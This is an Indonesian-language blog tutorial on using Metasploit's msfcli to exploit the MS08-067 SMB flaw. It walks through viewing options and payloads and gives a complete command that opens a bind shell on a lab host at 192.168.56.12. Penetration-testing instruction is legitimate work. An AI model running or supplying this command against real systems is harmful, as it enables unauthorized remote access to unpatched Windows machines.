Blog

Home   /   blog   /   SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

MSFCLI hampir mirip dengan msfconsole, Command Line Interface (CLI) ini menyediakan berbagai modul yang dapat digunakan pada suatu kasus. Namun, MSFCLI ini tidak memiliki beberapa fitur seperti halnya dengan msfconsole.
Untuk mengakses msfcli (pada Backtrack 5 R3) silakan klik Backtrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> Msfcli atau gunakan terminal untuk menjalankan perintah berikut:

# msfcli -h

msfcli -h

Kita akan mengambil contoh sederhana dari penggunaan msfcli ini, yaitu dengan mengeksploitasi
ms08_067_netapi. Exploit ini akan mengeksploitasi port smb yang terbuka. Smb port ini biasa digunakan untuk layanan sharring folder, aplikasi dan perangkat lain (seperti printer, scanner, dll)

Untuk melihat opsi apa yang harus dimasukkan pada operasi msfcli
kita bisa menggunakan opsi “O”

msfcli windows/smb/ms08_067_netapi O
msfcli windows/smb/ms08_067_netapi O

Opsi “P” ini digunakan untuk melihat apa payload yang mungkin bisa
digunakan dalam mengeksploitasi ini.

msfcli windows/smb/ms08_067_netapi P
msfcli windows/smb/ms08_067_netapi P

Terakhir adalah setting IP target dengan parameter RHOST, lalu pilih payload yang sesuai dan eksekusi exploit.

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.12 PAYLOAD=windows/shell/bind_tcp E

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.12 PAYLOAD=windows/shell/bind_tcp E
# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.12 PAYLOAD=windows/shell/bind_tcp E

Seperti yang terlihat, kita telah memperoleh akses shell lokal untuk mesin target setelah menetapkan parameter RHOST dan payload. Ini membuktikan bagaimana mudah dan efisiennya penggunaan MSFCLI untuk pengujian penetrasi dengan cepat.

Leave a Reply

Your email address will not be published. Required fields are marked *